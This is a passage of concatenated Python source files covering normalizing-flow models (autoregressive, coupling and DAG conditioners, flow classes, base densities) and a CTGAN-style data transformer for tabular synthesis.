batch_list = [i for i in range(batch_size, batch_size * y_LS.shape[0] // batch_size, batch_size)]
for y_batch, x_batch in zip(np.split(y_LS_shuffled, batch_list), np.split(x_LS_shuffled, batch_list)):
# We compute the log-likelihood as well as the base variable, check NormalizingFlow class for other possibilities
ll, z = flow.compute_ll(x=torch.tensor(y_batch).to(device).float(), context=torch.tensor(x_batch).to(device).float())
# Here we would like to maximize the log-likelihood of our model!
loss = -ll.mean()
opt.zero_grad()
loss.backward()
opt.step()
loss_batch += loss.item()
i += 1
# LS loss is the average over all the batch
loss_ls = loss_batch / i
# VS loss
ll_vs, z_vs = flow.compute_ll(x=torch.tensor(y_VS).to(device).float(), context=torch.tensor(x_VS).to(device).float())
loss_vs = -ll_vs.mean().item()
# TEST loss
ll_test, z_test = flow.compute_ll(x=torch.tensor(y_TEST).to(device).float(), context=torch.tensor(x_TEST).to(device).float())
loss_test = -ll_test.mean().item()
# Save NF model when the VS loss is minimal
loss_list.append([loss_ls, loss_vs, loss_test])
ll_VS_min = np.nanmin(np.asarray(loss_list)[:, 1]) # ignore nan value when considering the min
if not math.isnan(loss_vs) and loss_vs <= ll_VS_min:
# print('NEW MIN ON VS at epoch %s loss_vs %.2f ll_VS_min %.2f' %(epoch, loss_vs, ll_VS_min))
best_flow = flow # update the best flow
# dump_file(dir=dir, name=name + '_'+str(epoch), file=best_flow)
end = timer()
time_tot += end - start
if wdb:
wandb.log({"ls loss": loss_ls})
wandb.log({"vs loss": loss_vs})
wandb.log({"test loss": loss_test})
wandb.log({"vs min loss": ll_VS_min})
if epoch % 10 == 0:
# print("Epoch {:.0f} Approximate time left : {:2f} min - LS loss: {:4f} VS loss: {:4f} TEST loss: {:4f}".format(epoch, time_tot / (epoch + 1) * (nb_epoch - (epoch + 1)) / 60, loss_ls, loss_vs, loss_test))
print("Epoch {:.0f} Approximate time left : {:2f} min - LS loss: {:4f} VS loss: {:4f} TEST loss: {:4f}".format(epoch, time_tot / (epoch + 1) * (nb_epoch - (epoch + 1)) / 60, loss_ls, loss_vs, loss_test), end="\r", flush=True)
print('Fitting time_tot %.0f min' %(time_tot/60))
return np.asarray(loss_list), best_flow, flow
```
#### File: models/Conditionners/AutoregressiveConditioner.py
```python
import numpy as np
from .Conditioner import Conditioner
import torch
import torch.nn as nn
import torch.nn.functional as F
class MaskedLinear(nn.Linear):
""" same as Linear except has a configurable mask on the weights """
def __init__(self, in_features, out_features, bias=True):
super().__init__(in_features, out_features, bias)
self.register_buffer('mask', torch.ones(out_features, in_features))
def set_mask(self, mask):
self.mask.data.copy_(torch.from_numpy(mask.astype(np.uint8).T))
def forward(self, input):
return F.linear(input, self.mask * self.weight, self.bias)
class MAN(nn.Module):
def __init__(self, nin, hidden_sizes, nout, num_masks=1, natural_ordering=False, random=False, device="cpu"):
"""
nin: integer; number of inputs
hidden sizes: a list of integers; number of units in hidden layers
nout: integer; number of outputs, which usually collectively parameterize some kind of 1D distribution
note: if nout is e.g. 2x larger than nin (perhaps the mean and std), then the first nin
will be all the means and the second nin will be stds. i.e. output dimensions depend on the
same input dimensions in "chunks" and should be carefully decoded downstream appropriately.
the output of running the tests for this file makes this a bit more clear with examples.
num_masks: can be used to train ensemble over orderings/connections
natural_ordering: force natural ordering of dimensions, don't use random permutations
"""
super().__init__()
self.random = random
self.nin = nin
self.nout = nout
self.hidden_sizes = hidden_sizes
#assert self.nout % self.nin == 0, "nout must be integer multiple of nin"
# define a simple MLP neural net
self.net = []
hs = [nin] + hidden_sizes + [nout]
for h0, h1 in zip(hs, hs[1:]):
self.net.extend([
MaskedLinear(h0, h1),
nn.ReLU(),
])
self.net.pop() # pop the last ReLU for the output layer
self.net = nn.Sequential(*self.net)
# seeds for orders/connectivities of the model ensemble
self.natural_ordering = natural_ordering
self.num_masks = num_masks
self.seed = 0 # for cycling through num_masks orderings
self.m = {}
self.update_masks() # builds the initial self.m connectivity
# note, we could also precompute the masks and cache them, but this
# could get memory expensive for large number of masks.
def update_masks(self):
if self.m and self.num_masks == 1: return # only a single seed, skip for efficiency
L = len(self.hidden_sizes)
# fetch the next seed and construct a random stream
rng = np.random.RandomState(self.seed)
self.seed = (self.seed + 1) % self.num_masks
# sample the order of the inputs and the connectivity of all neurons
if self.random:
self.m[-1] = np.arange(self.nin) if self.natural_ordering else rng.permutation(self.nin)
for l in range(L):
self.m[l] = rng.randint(self.m[l - 1].min(), self.nin - 1, size=self.hidden_sizes[l])
else:
self.m[-1] = np.arange(self.nin)
for l in range(L):
self.m[l] = np.array([self.nin - 1 - (i % self.nin) for i in range(self.hidden_sizes[l])])
# construct the mask matrices
masks = [self.m[l - 1][:, None] <= self.m[l][None, :] for l in range(L)]
masks.append(self.m[L - 1][:, None] < self.m[-1][None, :])
# handle the case where nout = nin * k, for integer k > 1
if self.nout > self.nin:
k = int(self.nout / self.nin)
# replicate the mask across the other outputs
masks[-1] = np.concatenate([masks[-1]] * k, axis=1)
# set the masks in all MaskedLinear layers
layers = [l for l in self.net.modules() if isinstance(l, MaskedLinear)]
for l, m in zip(layers, masks):
l.set_mask(m)
# map between in_d and order
self.i_map = self.m[-1].copy()
for k in range(len(self.m[-1])):
self.i_map[self.m[-1][k]] = k
def forward(self, x):
return self.net(x).view(x.shape[0], -1, x.shape[1]).permute(0, 2, 1)
# ------------------------------------------------------------------------------
class ConditionnalMAN(MAN):
def __init__(self, nin, cond_in, hidden_sizes, nout, num_masks=1, natural_ordering=False, random=False,
device="cpu"):
"""
nin: integer; number of inputs
hidden sizes: a list of integers; number of units in hidden layers
nout: integer; number of outputs, which usually collectively parameterize some kind of 1D distribution
note: if nout is e.g. 2x larger than nin (perhaps the mean and std), then the first nin
will be all the means and the second nin will be stds. i.e. output dimensions depend on the
same input dimensions in "chunks" and should be carefully decoded downstream appropriately.
the output of running the tests for this file makes this a bit more clear with examples.
num_masks: can be used to train ensemble over orderings/connections
natural_ordering: force natural ordering of dimensions, don't use random permutations
"""
super().__init__(nin + cond_in, hidden_sizes, nout, num_masks, natural_ordering, random, device)
self.nin_non_cond = nin
self.cond_in = cond_in
def forward(self, x, context):
if context is not None:
out = super().forward(torch.cat((context, x), 1))
else:
out = super().forward(x)
out = out.contiguous()[:, self.cond_in:, :]
return out
class AutoregressiveConditioner(Conditioner):
"""
in_size: The dimension of the input vector, this corresponds to the number of autoregressive output vectors.
hidden: The dimension of the masked autoregressive neural network hidden layers.
out_size: The dimension of the output vectors.
cond_in: The dimension of the additional context input.
"""
def __init__(self, in_size, hidden, out_size, cond_in=0):
super(AutoregressiveConditioner, self).__init__()
self.in_size = in_size
self.masked_autoregressive_net = ConditionnalMAN(in_size, cond_in=cond_in, hidden_sizes=hidden, nout=out_size*(in_size + cond_in))
self.register_buffer("A", 1 - torch.tril(torch.ones(in_size, in_size)).T)
"""
x: An input tensor with dim=[b_size, in_size]
context: A context/conditionning tensor with dim=[b_size, cond_in]
return: An autoregressive embedding tensor of x conditionned on context, its dim is=[b_size, in_size, out_size]
"""
def forward(self, x, context=None):
return self.masked_autoregressive_net(x, context)
def depth(self):
return self.in_size - 1
```
#### File: models/Conditionners/CouplingConditioner.py
```python
from .Conditioner import Conditioner
import torch
import torch.nn as nn
class CouplingMLP(nn.Module):
def __init__(self, in_size, hidden, out_size, cond_in = 0):
super(CouplingMLP, self).__init__()
l1 = [in_size - int(in_size/2) + cond_in] + hidden
l2 = hidden + [out_size * int(in_size/2)]
layers = []
for h1, h2 in zip(l1, l2):
layers += [nn.Linear(h1, h2), nn.ReLU()]
layers.pop()
self.net = nn.Sequential(*layers)
def forward(self, x):
return self.net(x)
class CouplingConditioner(Conditioner):
def __init__(self, in_size, hidden, out_size, cond_in=0):
super(CouplingConditioner, self).__init__()
self.in_size = in_size
self.out_size = out_size
self.cond_size = int(in_size/2)
self.indep_size = in_size - self.cond_size
self.embeding_net = CouplingMLP(in_size, hidden, out_size, cond_in)
self.constants = nn.Parameter(torch.randn(self.indep_size, out_size))
self.register_buffer("A", torch.cat((torch.zeros(self.cond_size, in_size),
torch.cat((torch.ones(self.indep_size, self.cond_size), torch.zeros(self.indep_size, self.indep_size)), 1)), 0))
def forward(self, x, context=None):
if context is not None:
x = torch.cat((x, context), 1)
h1 = self.constants.unsqueeze(0).expand(x.shape[0], -1, -1)
h2 = self.embeding_net(x[:, :self.indep_size]).view(x.shape[0], self.cond_size, self.out_size)
return torch.cat((h1, h2), 1)
def depth(self):
return 1
```
#### File: models/Conditionners/DAGConditioner.py
```python
import torch
import torch.nn as nn
from .Conditioner import Conditioner
import networkx as nx
class DAGMLP(nn.Module):
def __init__(self, in_size, hidden, out_size, cond_in=0):
super(DAGMLP, self).__init__()
in_size = in_size
l1 = [in_size + cond_in] + hidden
l2 = hidden + [out_size]
layers = []
for h1, h2 in zip(l1, l2):
layers += [nn.Linear(h1, h2), nn.ReLU()]
layers.pop()
self.net = nn.Sequential(*layers)
def forward(self, x, context=None):
if context is not None:
x = torch.cat((x, context), 1)
return self.net(x)
class DAGConditioner(Conditioner):
def __init__(self, in_size, hidden, out_size, cond_in=0, soft_thresholding=True, h_thresh=0., gumble_T=1.,
hot_encoding=False, l1=0., nb_epoch_update=1, A_prior=None):
super(DAGConditioner, self).__init__()
if A_prior is None:
self.A = nn.Parameter(torch.ones(in_size, in_size) * 2. + torch.randn((in_size, in_size)) * .1)
else:
self.A = nn.Parameter(A_prior)
self.in_size = in_size
self.exponent = self.in_size % 50
self.s_thresh = soft_thresholding
self.h_thresh = h_thresh
self.stoch_gate = True
self.noise_gate = False
in_net = in_size * 2 if hot_encoding else in_size
if issubclass(type(hidden), nn.Module):
self.embedding_net = hidden
else:
self.embedding_net = DAGMLP(in_net, hidden, out_size, cond_in)
self.gumble = True
self.hutchinson = False
self.gumble_T = gumble_T
self.hot_encoding = hot_encoding
with torch.no_grad():
self.constrainA(h_thresh)
# Buffers related to the optimization of the constraints on A
self.register_buffer("c", torch.tensor(1e-3))
self.register_buffer("eta", torch.tensor(10.))
self.register_buffer("gamma", torch.tensor(.9))
self.register_buffer("lambd", torch.tensor(.0))
self.register_buffer("l1_weight", torch.tensor(l1))
self.register_buffer("dag_const", torch.tensor(1.))
self.alpha_factor = 1.
self.d = in_size
self.tol = 1e-10
self.register_buffer("alpha", self.getAlpha())
self.register_buffer("prev_trace", self.get_power_trace())
self.nb_epoch_update = nb_epoch_update
self.no_update = 0
self.is_invertible = False
self.register_buffer("buff_dagness", torch.zeros(10))
def getAlpha(self):
alpha = torch.tensor(1./self.in_size)
return alpha
def get_dag(self):
return self
def post_process(self, zero_threshold=None):
if zero_threshold is None:
zero_threshold = .1
G = nx.from_numpy_matrix((self.soft_thresholded_A().data.clone().abs() > zero_threshold).float().detach().cpu().numpy(), create_using=nx.DiGraph)
while not nx.is_directed_acyclic_graph(G):
zero_threshold += .05
G = nx.from_numpy_matrix(
(self.soft_thresholded_A().data.clone().abs() > zero_threshold).float().detach().cpu().numpy(),
create_using=nx.DiGraph)
self.stoch_gate = False
self.noise_gate = False
self.s_thresh = False
self.h_thresh = 0.
self.A.data = (self.soft_thresholded_A().data.clone().abs() > zero_threshold).float()
self.A *= 1. - torch.eye(self.in_size, device=self.A.device)
self.A.requires_grad = False
self.A.grad = None
self.is_invertible = True
def stochastic_gate(self, importance):
if self.gumble:
# Gumble soft-max gate
temp = self.gumble_T
epsilon = 1e-6
g1 = -torch.log(-torch.log(torch.rand(importance.shape, device=self.A.device)))
g2 = -torch.log(-torch.log(torch.rand(importance.shape, device=self.A.device)))
z1 = torch.exp((torch.log(importance + epsilon) + g1)/temp)
z2 = torch.exp((torch.log(1 - importance + epsilon) + g2)/temp)
return z1 / (z1 + z2)
else:
beta_1, beta_2 = 3., 10.
sigma = beta_1/(1. + beta_2*torch.sqrt((importance - .5)**2.))
mu = importance
z = torch.randn(importance.shape, device=self.A.device) * sigma + mu + .25
return torch.relu(z.clamp_max(1.))
def noiser_gate(self, x, importance):
noise = torch.randn(importance.shape, device=self.A.device) * torch.sqrt((1 - importance)**2)
return importance*(x + noise)
def soft_thresholded_A(self):
return 2*(torch.sigmoid(2*(self.A**2)) -.5)
def hard_thresholded_A(self):
if self.s_thresh:
return self.soft_thresholded_A()*(self.soft_thresholded_A() > self.h_thresh).float()
return self.A**2 * (self.A**2 > self.h_thresh).float()
def forward(self, x, context=None):
b_size = x.shape[0]
if self.h_thresh > 0:
if self.stoch_gate:
e = (x.unsqueeze(1).expand(-1, self.in_size, -1) * self.stochastic_gate(self.hard_thresholded_A().unsqueeze(0)
.expand(x.shape[0], -1, -1)))\
.view(x.shape[0] * self.in_size, -1)
elif self.noise_gate:
e = self.noiser_gate(x.unsqueeze(1).expand(-1, self.in_size, -1),
self.hard_thresholded_A().unsqueeze(0)
.expand(x.shape[0], -1, -1))\
.view(x.shape[0] * self.in_size, -1)
else:
e = (x.unsqueeze(1).expand(-1, self.in_size, -1) * self.hard_thresholded_A().unsqueeze(0)
.expand(x.shape[0], -1, -1)).view(x.shape[0] * self.in_size, -1)
elif self.s_thresh:
if self.stoch_gate:
e = (x.unsqueeze(1).expand(-1, self.in_size, -1) * self.stochastic_gate(self.soft_thresholded_A().unsqueeze(0)
.expand(x.shape[0], -1, -1))).view(x.shape[0] * self.in_size, -1)
elif self.noise_gate:
e = self.noiser_gate(x.unsqueeze(1).expand(-1, self.in_size, -1),
self.soft_thresholded_A().unsqueeze(0).expand(x.shape[0], -1, -1))\
.view(x.shape[0] * self.in_size, -1)
else:
e = (x.unsqueeze(1).expand(-1, self.in_size, -1) * self.soft_thresholded_A().unsqueeze(0)
.expand(x.shape[0], -1, -1)).view(x.shape[0] * self.in_size, -1)
else:
e = (x.unsqueeze(1).expand(-1, self.in_size, -1) * self.A.unsqueeze(0).expand(x.shape[0], -1, -1))\
.view(x.shape[0] * self.in_size, -1)
if self.hot_encoding:
hot_encoding = torch.eye(self.in_size, device=self.A.device).unsqueeze(0).expand(x.shape[0], -1, -1)\
.contiguous().view(-1, self.in_size)
# # TODO CLEAN CODE FOR the positional encoding.
# width = int(self.in_size**.5)
# indices = torch.arange(width, device=self.A.device).unsqueeze(0).expand(width, -1).contiguous()
# mesh = torch.cat((indices.view(-1, 1), indices.T.contiguous().view(-1, 1)), 1).float()/width
# pos_encoding = mesh.unsqueeze(0).expand(x.shape[0], -1, -1).contiguous().view(-1, 2)
if context is not None:
context = context.unsqueeze(1).expand(-1, self.in_size, -1).reshape(b_size*self.in_size, -1)
e = self.embedding_net(torch.cat((e, hot_encoding), 1), context)#.view(x.shape[0], self.in_size, -1)
full_e = torch.cat((e, hot_encoding), 1).view(x.shape[0], self.in_size, -1)
#full_e = torch.cat((e, pos_encoding), 1).view(x.shape[0], self.in_size, -1)
# TODO Add context
return full_e
return self.embedding_net(e).view(x.shape[0], self.in_size, -1)#.permute(0, 2, 1).contiguous().view(x.shape[0], -1)
def constrainA(self, zero_threshold=.0001):
self.A *= (self.A.clone().abs() > zero_threshold).float()
self.A *= 1. - torch.eye(self.in_size, device=self.A.device)
return
def get_power_trace(self):
alpha = min(1., self.alpha)
alpha *= self.alpha_factor
if self.hutchinson != 0:
h_iter = self.hutchinson
trace = 0.
I = torch.eye(self.in_size, device=self.A.device)
for j in range(h_iter):
e0 = torch.randn(self.in_size, 1).to(self.A.device)
e = e0
for i in range(self.in_size):
e = (I + alpha * self.A ** 2) @ e
trace += (e0 * e).sum()
return trace / h_iter - self.in_size
B = (torch.eye(self.in_size, device=self.A.device) + alpha * self.A ** 2)
M = torch.matrix_power(B, self.exponent)
return torch.diag(M).sum() - self.in_size
def update_dual_param(self):
with torch.no_grad():
lag_const = self.get_power_trace()
while self.dag_const > 0. and lag_const < self.tol and self.exponent < self.in_size:
print("Update exponent", self.exponent)
if self.in_size > 50:
self.exponent += 50
else:
self.exponent = self.in_size
lag_const = self.get_power_trace()
if self.dag_const > 0. and lag_const > self.tol:
self.lambd = self.lambd + self.c * lag_const
# Absolute does not make sense (but copied from DAG-GNN)
if lag_const.abs() > self.gamma*self.prev_trace.abs():
self.c *= self.eta
self.prev_trace = lag_const
elif self.dag_const > 0.:
print("DAGness is very low: %f -> Post processing" % torch.log(lag_const), flush=True)
A_before = self.A.clone()
self.post_process()
self.alpha = torch.tensor(self.getAlpha())
lag_const = self.get_power_trace()
print("DAGness is now: %f" % torch.log(lag_const), flush=True)
if lag_const > 0.:
print("Error in post-processing.", flush=True)
self.stoch_gate = True
self.noise_gate = False
self.s_thresh = True
self.h_thresh = 0.
self.A = nn.Parameter(A_before)
self.A.requires_grad = True
self.A.grad = self.A.clone()
self.alpha = torch.tensor(self.getAlpha())
self.prev_trace = self.get_power_trace()
self.c *= 1/self.eta
self.lambd = self.lambd + self.c * lag_const
self.dag_const = torch.tensor(1.)
else:
self.dag_const = torch.tensor(0., device=self.A.device)
self.l1_weight = torch.tensor(0., device=self.A.device)
print("Post processing successful.")
print("Number of edges is %d VS number max is %d" %
(int(self.A.sum().item()), ((self.d - 1)*self.d)/2), flush=True)
else:
G = nx.from_numpy_matrix(self.A.detach().cpu().numpy() ** 2, create_using=nx.DiGraph)
try:
nx.find_cycle(G)
print("Bad news there is still cycles in this graph.", flush=True)
self.A.requires_grad = True
self.A.grad = self.A.clone()
self.stoch_gate = True
self.noise_gate = False
self.s_thresh = True
self.h_thresh = 0.
self.alpha = self.getAlpha()
self.prev_trace = self.get_power_trace()
self.dag_const = torch.tensor(1.)
print(self.in_size, self.prev_trace)
except nx.NetworkXNoCycle:
print("Good news there is no cycle in this graph.", flush=True)
print("Depth of the graph is: %d" % self.depth())
self.is_invertible = True#torch.tensor(True)
print("DAGness is still very low: %f" % torch.log(self.get_power_trace()), flush=True)
return lag_const
def depth(self):
G = nx.from_numpy_matrix(self.A.detach().cpu().numpy() ** 2, create_using=nx.DiGraph)
if self.is_invertible or nx.is_directed_acyclic_graph(G):
return int(nx.dag_longest_path_length(G))
return 0
def loss(self):
lag_const = self.get_power_trace()
loss = self.dag_const*(self.lambd*lag_const + self.c/2*lag_const**2) + self.l1_weight*self.A.abs().mean()
return loss
def step(self, epoch_number, loss_avg=0.):
with torch.no_grad():
lag_const = self.get_power_trace()
if lag_const > 1000:
self.exponent -= 5
self.exponent = self.exponent if self.exponent > 3 else 3
if epoch_number % self.nb_epoch_update == 0 and epoch_number > 0:
if self.loss().abs() < torch.tensor(loss_avg).abs() / 2 or self.no_update > 10:
print("Update param", flush=True)
self.update_dual_param()
self.no_update = 0
else:
print("No Update param", flush=True)
self.no_update += 1
```
#### File: models/Step/NormalizingFlow.py
```python
import torch
import torch.nn as nn
from models.Conditionners import Conditioner, DAGConditioner
from models.Normalizers import Normalizer
from models.Utils.Distributions import FlowDensity
class NormalizingFlow(nn.Module):
def __init__(self):
super(NormalizingFlow, self).__init__()
'''
Should return the x transformed and the log determinant of the Jacobian of the transformation
'''
def forward(self, x, context=None):
pass
'''
Should return a term relative to the loss.
'''
def constraintsLoss(self):
pass
'''
Should return the dagness of the associated graph.
'''
def DAGness(self):
pass
'''
Step in the optimization procedure;
'''
def step(self, epoch_number, loss_avg):
pass
'''
Return a list containing the conditioners.
'''
def getConditioners(self):
pass
'''
Return True if the architecture is invertible.
'''
def isInvertible(self):
pass
'''
Return a list containing the normalizers.
'''
def getNormalizers(self):
pass
'''
Return the x that would generate z: [B, d] tensor.
'''
def invert(self, z, context=None):
pass
class NormalizingFlowStep(NormalizingFlow):
def __init__(self, conditioner: Conditioner, normalizer: Normalizer):
super(NormalizingFlowStep, self).__init__()
self.conditioner = conditioner
self.normalizer = normalizer
def forward(self, x, context=None):
h = self.conditioner(x, context)
z, jac = self.normalizer(x, h, context)
return z, torch.log(jac).sum(1)
def constraintsLoss(self):
if issubclass(type(self.conditioner), DAGConditioner):
return self.conditioner.loss()
return 0.
def DAGness(self):
if issubclass(type(self.conditioner), DAGConditioner):
return [self.conditioner.get_power_trace()]
return [0.]
def step(self, epoch_number, loss_avg):
if issubclass(type(self.conditioner), DAGConditioner):
self.conditioner.step(epoch_number, loss_avg)
def getConditioners(self):
return [self.conditioner]
def getNormalizers(self):
return [self.normalizer]
def isInvertible(self):
for conditioner in self.getConditioners():
if not conditioner.is_invertible:
return False
return True
def invert(self, z, context=None):
x = torch.zeros_like(z)
for i in range(self.conditioner.depth() + 1):
h = self.conditioner(x, context)
x_prev = x
x = self.normalizer.inverse_transform(z, h, context)
if torch.norm(x - x_prev) == 0.:
break
return x
class FCNormalizingFlow(NormalizingFlow):
def __init__(self, steps: NormalizingFlow, z_log_density: FlowDensity):
super(FCNormalizingFlow, self).__init__()
self.steps = nn.ModuleList()
self.z_log_density = z_log_density
for step in steps:
self.steps.append(step)
def forward(self, x, context=None):
jac_tot = 0.
inv_idx = torch.arange(x.shape[1] - 1, -1, -1).long()
for step in self.steps:
z, jac = step(x, context)
x = z[:, inv_idx]
jac_tot += jac
return z, jac_tot
def constraintsLoss(self):
loss = 0.
for step in self.steps:
loss += step.constraintsLoss()
return loss
def DAGness(self):
dagness = []
for step in self.steps:
dagness += step.DAGness()
return dagness
def step(self, epoch_number, loss_avg):
for step in self.steps:
step.step(epoch_number, loss_avg)
def loss(self, z, jac):
log_p_x = jac + self.z_log_density(z)
return self.constraintsLoss() - log_p_x.mean()
def compute_ll(self, x, context=None):
z, jac_tot = self(x, context)
log_p_x = jac_tot + self.z_log_density(z)
return log_p_x, z
def getNormalizers(self):
normalizers = []
for step in self.steps:
normalizers += step.getNormalizers()
return normalizers
def getConditioners(self):
conditioners = []
for step in self.steps:
conditioners += step.getConditioners()
return conditioners
def isInvertible(self):
for conditioner in self.getConditioners():
if not conditioner.is_invertible:
return False
return True
def invert(self, z, context=None):
if type(z) is list:
z = self.z_log_density.sample(z)
inv_idx = torch.arange(z.shape[1] - 1, -1, -1).long()
for step in range(len(self.steps)):
x = self.steps[-step - 1].invert(z, context)
z = x[:, inv_idx]
return x
class CNNormalizingFlow(FCNormalizingFlow):
def __init__(self, steps, z_log_density, dropping_factors):
super(CNNormalizingFlow, self).__init__(steps, z_log_density)
self.dropping_factors = dropping_factors
def forward(self, x, context=None):
b_size = x.shape[0]
jac_tot = 0.
z_all = []
for step, drop_factors in zip(self.steps, self.dropping_factors):
z, jac = step(x, context)
d_c, d_h, d_w = drop_factors
C, H, W = step.img_sizes
c, h, w = int(C/d_c), int(H/d_h), int(W/d_w)
z_reshaped = z.view(-1, C, H, W).unfold(1, d_c, d_c).unfold(2, d_h, d_h) \
.unfold(3, d_w, d_w).contiguous().view(b_size, c, h, w, -1)
z_all += [z_reshaped[:, :, :, :, 1:].contiguous().view(b_size, -1)]
x = z.view(-1, C, H, W).unfold(1, d_c, d_c).unfold(2, d_h, d_h) \
.unfold(3, d_w, d_w).contiguous().view(b_size, c, h, w, -1)[:, :, :, :, 0] \
.contiguous().view(b_size, -1)
jac_tot += jac
z_all += [x]
z = torch.cat(z_all, 1)
return z, jac_tot
def invert(self, z, context=None):
b_size = z.shape[0]
z_all = []
i = 0
for step, drop_factors in zip(self.steps, self.dropping_factors):
d_c, d_h, d_w = drop_factors
C, H, W = step.img_sizes
c, h, w = int(C / d_c), int(H / d_h), int(W / d_w)
nb_z = C*H*W - c*h*w if C*H*W != c*h*w else c*h*w
z_all += [z[:, i:i+nb_z]]
i += nb_z
x = 0.
for i in range(1, len(self.steps) + 1):
step = self.steps[-i]
drop_factors = self.dropping_factors[-i]
d_c, d_h, d_w = drop_factors
C, H, W = step.img_sizes
c, h, w = int(C / d_c), int(H / d_h), int(W / d_w)
z = z_all[-i]
if c*h*w != C*H*W:
z = z.view(b_size, c, h, w, -1)
x = x.view(b_size, c, h, w, 1)
z = torch.cat((x, z), 4)
z = z.view(b_size, c, h, w, d_c, d_h, d_w)
z = z.permute(0, 1, 2, 3, 6, 4, 5).contiguous().view(b_size, c, h, W, d_c, d_h)
z = z.permute(0, 1, 2, 5, 3, 4).contiguous().view(b_size, c, H, W, d_c)
z = z.permute(0, 1, 4, 2, 3).contiguous().view(b_size, C, H, W)
x = step.invert(z.view(b_size, -1), context)
return x
class FixedScalingStep(NormalizingFlow):
def __init__(self, mu, std):
super(FixedScalingStep, self).__init__()
self.mu = mu
self.std = std
def forward(self, x, context=None):
z = (x - self.mu.unsqueeze(0).expand(x.shape[0], -1))/self.std.unsqueeze(0).expand(x.shape[0], -1)
jac = self.std.unsqueeze(0).expand(x.shape[0], -1)
return z, -torch.log(jac).sum(1)
def constraintsLoss(self):
return 0.
def DAGness(self):
return [0.]
def step(self, epoch_number, loss_avg):
return
def getConditioners(self):
return []
def getNormalizers(self):
return []
def isInvertible(self):
return True
def invert(self, z, context=None):
x = z * self.std.unsqueeze(0).expand(z.shape[0], -1) + self.mu.unsqueeze(0).expand(z.shape[0], -1)
return x
```
#### File: models/Utils/Distributions.py
```python
import torch.distributions as D
import torch
from math import pi
import torch.nn as nn
class FlowDensity(nn.Module):
def __init__(self):
super(FlowDensity, self).__init__()
def forward(self, z):
pass
def sample(self, shape):
pass
class NormalLogDensity(nn.Module):
def __init__(self):
super(NormalLogDensity, self).__init__()
self.register_buffer("pi", torch.tensor(pi))
def forward(self, z):
return torch.distributions.Normal(loc=0., scale=1.).log_prob(z).sum(1)
def sample(self, shape):
return torch.randn(shape)
class MixtureLogDensity(nn.Module):
def __init__(self, n_mode=10):
super(MixtureLogDensity, self).__init__()
self.register_buffer("pi", torch.tensor(pi))
self.register_buffer("mu", torch.arange(-3., 3.0001, 6. / float(n_mode - 1)))
self.register_buffer("sigma", torch.ones(n_mode, ) * 1.5 / float(n_mode))
self.register_buffer("mix_weights", torch.ones(n_mode, ))
def forward(self, z):
mix = D.Categorical(self.mix_weights)
comp = D.Normal(self.mu, self.sigma)
dist = D.MixtureSameFamily(mix, comp)
return dist.log_prob(z).sum(1)
``` |
{
"source": "JonathanDZiegler/CTGAN",
"score": 3
} |
#### File: CTGAN/ctgan/data_transformer.py
```python
from collections import namedtuple
import numpy as np
import pandas as pd
from rdt.transformers import BayesGMMTransformer, OneHotEncodingTransformer
SpanInfo = namedtuple('SpanInfo', ['dim', 'activation_fn'])
ColumnTransformInfo = namedtuple(
'ColumnTransformInfo', [
'column_name', 'column_type', 'transform', 'output_info', 'output_dimensions'
]
)
class DataTransformer(object):
"""Data Transformer.
Model continuous columns with a BayesianGMM and normalized to a scalar [0, 1] and a vector.
Discrete columns are encoded using a scikit-learn OneHotEncoder.
"""
def __init__(self, max_clusters=10, weight_threshold=0.005):
"""Create a data transformer.
Args:
max_clusters (int):
Maximum number of Gaussian distributions in Bayesian GMM.
weight_threshold (float):
Weight threshold for a Gaussian distribution to be kept.
"""
self._max_clusters = max_clusters
self._weight_threshold = weight_threshold
def _fit_continuous(self, data):
"""Train Bayesian GMM for continuous columns.
Args:
data (pd.DataFrame):
A dataframe containing a column.
Returns:
namedtuple:
A ``ColumnTransformInfo`` object.
"""
column_name = data.columns[0]
gm = BayesGMMTransformer()
gm.fit(data, [column_name])
num_components = sum(gm.valid_component_indicator)
return ColumnTransformInfo(
column_name=column_name, column_type='continuous', transform=gm,
output_info=[SpanInfo(1, 'tanh'), SpanInfo(num_components, 'softmax')],
output_dimensions=1 + num_components)
def _fit_discrete(self, data):
"""Fit one hot encoder for discrete column.
Args:
data (pd.DataFrame):
A dataframe containing a column.
Returns:
namedtuple:
A ``ColumnTransformInfo`` object.
"""
column_name = data.columns[0]
ohe = OneHotEncodingTransformer()
ohe.fit(data, [column_name])
num_categories = len(ohe.dummies)
return ColumnTransformInfo(
column_name=column_name, column_type='discrete', transform=ohe,
output_info=[SpanInfo(num_categories, 'softmax')],
output_dimensions=num_categories)
def fit(self, raw_data, discrete_columns=()):
"""Fit the ``DataTransformer``.
Fits a ``BayesGMMTransformer`` for continuous columns and a
``OneHotEncodingTransformer`` for discrete columns.
This step also counts the #columns in matrix data and span information.
"""
self.output_info_list = []
self.output_dimensions = 0
self.dataframe = True
if not isinstance(raw_data, pd.DataFrame):
self.dataframe = False
# work around for RDT issue #328 Fitting with numerical column names fails
discrete_columns = [str(column) for column in discrete_columns]
column_names = [str(num) for num in range(raw_data.shape[1])]
raw_data = pd.DataFrame(raw_data, columns=column_names)
self._column_raw_dtypes = raw_data.infer_objects().dtypes
self._column_transform_info_list = []
for column_name in raw_data.columns:
if column_name in discrete_columns:
column_transform_info = self._fit_discrete(raw_data[[column_name]])
else:
column_transform_info = self._fit_continuous(raw_data[[column_name]])
self.output_info_list.append(column_transform_info.output_info)
self.output_dimensions += column_transform_info.output_dimensions
self._column_transform_info_list.append(column_transform_info)
def _transform_continuous(self, column_transform_info, data):
column_name = data.columns[0]
data[column_name] = data[column_name].to_numpy().flatten()
gm = column_transform_info.transform
transformed = gm.transform(data, [column_name])
# Converts the transformed data to the appropriate output format.
# The first column (ending in '.normalized') stays the same,
# but the lable encoded column (ending in '.component') is one hot encoded.
output = np.zeros((len(transformed), column_transform_info.output_dimensions))
output[:, 0] = transformed[f'{column_name}.normalized'].to_numpy()
index = transformed[f'{column_name}.component'].to_numpy().astype(int)
output[np.arange(index.size), index + 1] = 1.0
return output
def _transform_discrete(self, column_transform_info, data):
ohe = column_transform_info.transform
return ohe.transform(data).to_numpy()
def transform(self, raw_data):
"""Take raw data and output a matrix data."""
if not isinstance(raw_data, pd.DataFrame):
column_names = [str(num) for num in range(raw_data.shape[1])]
raw_data = pd.DataFrame(raw_data, columns=column_names)
column_data_list = []
for column_transform_info in self._column_transform_info_list:
column_name = column_transform_info.column_name
data = raw_data[[column_name]]
if column_transform_info.column_type == 'continuous':
column_data_list.append(self._transform_continuous(column_transform_info, data))
else:
column_data_list.append(self._transform_discrete(column_transform_info, data))
return np.concatenate(column_data_list, axis=1).astype(float)
